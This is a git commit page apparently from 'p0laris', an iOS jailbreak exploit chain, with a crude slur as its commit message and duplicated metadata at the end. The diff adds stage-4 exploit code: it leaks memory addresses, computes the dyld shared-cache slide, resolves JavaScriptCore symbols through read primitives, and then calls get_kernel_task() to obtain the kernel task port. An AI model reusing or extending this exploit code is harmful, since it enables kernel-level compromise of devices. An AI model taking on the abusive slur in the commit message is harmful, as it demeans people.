fucking retard

author: spv420 <spv@spv.sh> 2022-07-31 04:30:23 -0400
committer: spv420 <spv@spv.sh> 2022-07-31 04:30:23 -0400
commit: b88cb06e11df31cb7f079d2c78c42b7fced7bb17 (patch)
tree: eb0fda7835e6c10795f1873aee7384408a37f55c /src/stage4/main.js
parent: eb21089efd298dfec49ebd2836105f5d900d50ae (diff)
1 files changed, 14 insertions, 0 deletions
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 53a74ec..af2ed69 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -12,6 +12,13 @@ var SOCK_DGRAM = 2;
 var SOCK_DGRAM = 2;
 var IPPROTO_UDP = 17;
 
+function prep_shit() {
+	string_ref = scall("JSStringCreateWithUTF8CString", "victim");
+	global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+	jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+	large_buf_ptr = leak_vec(large_buf);
+}
+
 function main() {
 	syslog(LOG_SYSLOG, "__p0laris_LOG_START__");
 	p0laris_log("[*] we out here");
@@ -24,6 +31,13 @@ function main() {
 
 	printf("test");
 
+	var dyld_shc_slide = get_dyld_shc_slide();
+
+	sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+	sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+	sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+	prep_shit();
+
 	var tfp0 = get_kernel_task();
 
 	syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
author	spv420 <spv@spv.sh>	2022-07-31 04:30:23 -0400
committer	spv420 <spv@spv.sh>	2022-07-31 04:30:23 -0400
commit	b88cb06e11df31cb7f079d2c78c42b7fced7bb17 (patch)
tree	eb0fda7835e6c10795f1873aee7384408a37f55c /src/stage4/main.js
parent	eb21089efd298dfec49ebd2836105f5d900d50ae (diff)